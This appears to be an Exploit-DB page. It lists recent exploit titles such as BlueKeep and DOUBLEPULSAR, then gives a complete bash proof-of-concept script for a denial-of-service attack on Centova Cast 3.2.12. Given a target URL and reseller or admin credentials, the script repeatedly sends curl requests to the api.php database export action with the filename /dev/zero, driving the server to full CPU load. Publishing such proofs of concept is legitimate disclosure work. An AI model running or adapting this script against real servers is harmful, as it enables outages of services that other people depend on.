
13 changes to exploits/shellcodes ipPulse 1.92 - 'Enter Key' Denial of Service (PoC) Centova Cast 3.2.12 - Denial of Service (PoC) scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC) XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable' Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution Apache Httpd mod_proxy - Error Page Cross-Site Scripting Apache Httpd mod_rewrite - Open Redirects WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
32 lines
No EOL
748 B
Bash
Executable file
32 lines
No EOL
748 B
Bash
Executable file
# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
|
|
# Date: 2019-11-18
|
|
# Exploit Author: DroidU
|
|
# Vendor Homepage: https://centova.com
|
|
# Affected Version: <=v3.2.12
|
|
# Tested on: Debian 9, CentOS 7
|
|
# ===============================================
|
|
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
|
|
|
|
#!/bin/bash
|
|
if [ "$3" = "" ]
|
|
then
|
|
echo "Usage: $0 centovacast_url reseller/admin password"
|
|
exit
|
|
fi
|
|
url=$1
|
|
reseller=$2
|
|
pass=$3
|
|
|
|
|
|
dwn() {
|
|
echo -n .
|
|
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
|
|
}
|
|
|
|
for i in {0..32}
|
|
do
|
|
dwn /dev/zero
|
|
sleep .1
|
|
done
|
|
echo "
|
|
Done!" |